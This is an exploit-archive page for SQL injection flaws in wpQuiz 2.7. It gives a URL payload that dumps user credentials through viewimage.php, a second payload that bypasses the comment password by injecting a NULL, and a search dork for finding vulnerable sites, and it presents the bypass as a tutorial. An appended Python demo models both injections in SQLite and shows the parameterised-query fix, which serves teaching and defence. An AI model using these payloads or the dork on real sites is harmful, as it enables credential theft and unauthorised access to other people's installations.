Description
Exploit for unknown platform in category web applications
Source: 0day.today exploit 1337DAY-ID-2321 (https://0day.today/exploit/2321; description page https://0day.today/exploit/description/2321)
Title: wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities
Reporter: Kacper
Published: 2007-11-27 (modified 2007-11-27); last seen by the aggregator 2018-01-05
CVSS: none assigned; no CVE listed; no references

========================================================
wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities
========================================================

Title: wpQuiz 2.7 Remote SQL Injection Vulnerability
### http://wireplastik.com/projects.php

Author: Kacper

Bug:

viewimage.php?id=-1'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,concat(user,char(58),password),14,15+from+users+where+id=1/*

Then download the image and check its source!

==========================================================================================================================
The second bug concerns unauthorised access to commenting on quiz results.

Copied straight from => http://devilteam.eu/forum/topics92/bypass-za-pomoca-sql-wpquiz-vt4278.htm
==========================================================================================================================
Hi, recently I came across an interesting quiz script (WpQuiz) and found a few interesting bugs in it.

The script has an option that lets the administrator lock commenting on quiz results behind a password.

The file comments.php contains this source:
Code:
$no = $_GET['id'];   // taken straight from the URL: no escaping, no cast to int
$setcheck = mysql_fetch_array(mysql_query("SELECT * FROM sets WHERE id='".$no."'"));   // $no is concatenated into the query
if( mysql_affected_rows() == 0 ){
geterror("commentsinvalidset");
}
if( $setcheck['isopen'] == 0 ){
geterror("commentsquestionsetclosed");
}
if($setcheck['password'] != ""){   // loose comparison: a NULL password compares equal to ""
if( !isset($_POST['password']) || ($_POST['password'] != $setcheck['password']) ){
?>
<form name="pwCheck" action="<?= $_SERVER['PHP_SELF'] ?>?id=<?=$no?>" method="post">
<div class="pagehead"><span class="big"><b><?=getlang("commentspasswordheader",1)?></b></span></div>
<b><?=getlang("commentspasswordrequest",1)?></b><br />
<?=getlang("commentspassword",1)?> <input type="password" name="password" />
<input type="submit" value="<?=getlang("commentspasswordsubmit",1)?>" />
</form>
<?php
exit;
}
}

As you can see:
Code:
if($setcheck['password'] != ""){

the script reads the comment-locking information from the database. If that field is empty, i.e. (null=0), the script will not ask for a password.

So we run our SQL query through this line:
Code:
$no = $_GET['id'];
$setcheck = mysql_fetch_array(mysql_query("SELECT * FROM sets WHERE id='".$no."'"));

Our query:
Code:
comments.php?id=-9'+union+select+0,1,2,3,4,5,null,7,8,9,10,11,12,13/*

By trial and error I worked out that column number 6 is the password column, and I put a null there.

This little tutorial may come in handy for those who want to bypass something that is locked with a password.
==========================================================================================================================

//dork: "Powered by wpQuiz"

Regards

# 0day.today [2018-01-05] #
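The following is an added worked example, not code from the advisory, from the devilteam.eu post, or from wpQuiz itself. It models the two vulnerable lookups described above (the `comments.php` password gate and the `viewimage.php` lookup) in an in-memory SQLite database, runs the page's own two payloads against them, and puts the parameterised fix beside them. The table layouts, column names and row contents are constructed for the demo: the page only establishes that `SELECT * FROM sets` returns 14 columns with the password at index 6 and that the `viewimage.php` row has 16 columns with the rendered source at index 13, so `isopen` at index 5 and the column names `c7`, `src` and so on are assumptions. MySQL's `concat(user,char(58),password)` is written `user||char(58)||password` because SQLite has no `concat()`.

```python
"""
Added worked example (not the advisory's or wpQuiz's code): SQLite model of the
two wpQuiz 2.7 injections on this page, with the page's payloads and the fix.
Schemas, column names and rows are constructed; see the lead-in for what is assumed.
"""
import sqlite3
from urllib.parse import unquote_plus

# Payloads as written on the page; '+' is a URL-encoded space and
# unquote_plus turns it back into one, as PHP does when filling $_GET.
COMMENTS_PAYLOAD = "-9'+union+select+0,1,2,3,4,5,null,7,8,9,10,11,12,13/*"
# SQLite spelling of concat(user,char(58),password); char(58) is ':'.
VIEWIMAGE_PAYLOAD = ("-1'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,"
                     "user||char(58)||password,14,15+from+users+where+id=1/*")

ISOPEN_COL = 5     # assumed position of `isopen` in SELECT * FROM sets
PASSWORD_COL = 6   # position of `password` the forum post found by trial and error
SRC_COL = 13       # assumed position that viewimage.php echoes as the image source


def build_db():
    """Constructed fixture: one password-locked set, one user, one image."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sets (id INTEGER, title TEXT, description TEXT, author TEXT,
            created TEXT, isopen INTEGER, password TEXT, c7 TEXT, c8 TEXT, c9 TEXT,
            c10 TEXT, c11 TEXT, c12 TEXT, c13 TEXT);
        INSERT INTO sets VALUES (1,'Demo quiz','','admin','2007-11-27',1,'letmein',
            '','','','','','','');
        CREATE TABLE users (id INTEGER, user TEXT, password TEXT);
        INSERT INTO users VALUES (1,'admin','adminpass');
        CREATE TABLE images (id INTEGER, setid INTEGER, c2 TEXT, c3 TEXT, c4 TEXT,
            c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT, c10 TEXT, c11 TEXT,
            c12 TEXT, src TEXT, c14 TEXT, c15 TEXT);
        INSERT INTO images VALUES (1,1,'','','','','','','','','','','',
            'images/q1.png','','');
    """)
    return db


def vulnerable_setcheck(db, id_param):
    """comments.php as quoted on the page: $_GET['id'] is concatenated into the
    query unescaped, and mysql_fetch_array() hands back the first row. With a
    UNION on an id that does not exist, that first row is the attacker's row."""
    sql = "SELECT * FROM sets WHERE id='" + unquote_plus(id_param) + "'"
    return db.execute(sql).fetchone()


def comments_gate(db, id_param, posted_password=None):
    """The checks that follow the lookup. PHP's  $setcheck['password'] != ""
    is a loose comparison, so a NULL password behaves like an empty string
    and the password form is skipped; the attacker's row puts NULL there."""
    setcheck = vulnerable_setcheck(db, id_param)
    if setcheck is None:
        return "commentsinvalidset"
    if setcheck[ISOPEN_COL] == 0:
        return "commentsquestionsetclosed"
    if setcheck[PASSWORD_COL] not in ("", None):
        if posted_password != setcheck[PASSWORD_COL]:
            return "password form"
    return "comments allowed"


def vulnerable_viewimage_src(db, id_param):
    """viewimage.php modelled the same way; returns the value the advisory says
    to look for in the source of the downloaded image."""
    sql = "SELECT * FROM images WHERE id='" + unquote_plus(id_param) + "'"
    row = db.execute(sql).fetchone()
    return None if row is None else row[SRC_COL]


def safe_setcheck(db, id_param):
    """Fix: bind the id as a query parameter, so quotes and UNION are plain
    data and a non-numeric id matches nothing. Casting to int before the
    query is the other usual fix, since set ids are numeric."""
    return db.execute("SELECT * FROM sets WHERE id=?",
                      (unquote_plus(id_param),)).fetchone()


if __name__ == "__main__":
    db = build_db()
    print("normal request:", comments_gate(db, "1"))                          # password form
    print("with payload:  ", comments_gate(db, COMMENTS_PAYLOAD))             # comments allowed
    print("viewimage leak:", vulnerable_viewimage_src(db, VIEWIMAGE_PAYLOAD))  # admin:adminpass
    print("fixed lookup:  ", safe_setcheck(db, COMMENTS_PAYLOAD))             # None
```

The two payloads work for the same reason: with an id that matches nothing, the only row the query returns is the one the UNION supplies, and the script trusts whatever is in that row (a NULL password in `comments.php`, user credentials in the column that `viewimage.php` renders). The trailing `/*` swallows the closing quote the script appends. Binding the id as a parameter, or casting it to an integer, removes the injection point in both scripts.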